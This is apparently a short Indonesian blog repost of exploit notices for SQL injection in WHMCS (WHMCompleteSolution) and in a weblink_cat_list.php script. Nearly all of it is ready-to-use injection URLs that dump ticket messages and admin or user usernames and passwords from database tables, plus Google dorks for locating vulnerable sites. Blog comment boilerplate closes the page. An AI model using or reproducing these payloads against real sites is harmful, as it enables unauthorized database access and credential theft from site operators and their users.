#=Info=======================================================================#
# Software: WHMCS control (WHMCompleteSolution) Sql Injection # |
# Vulnerability: Remote Sql Injection # |
# Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS |
#=Sql
Injection ===========================================================================================================================================================# |
#
Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0
union all select 1,2,3,4,message,6,7,8,9,10 from
tbltickets--%20 |
#
DOWNLOAD :
http://www.whmcs.com/
|
#
Live demo: http://ste/support/submitticket.php?step=2&deptid=001'
and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from
tbladmins--%20 |
#=========================================================================================================================================================================# |
Dork :inurl:"weblink_cat_list.php?bcat_id="
**************************************************************************/
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ] |
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user |
[ GReets ]
Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi
Tidak ada komentar:
Posting Komentar
Diharapkan dapat memberikan komentar yang membangun
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.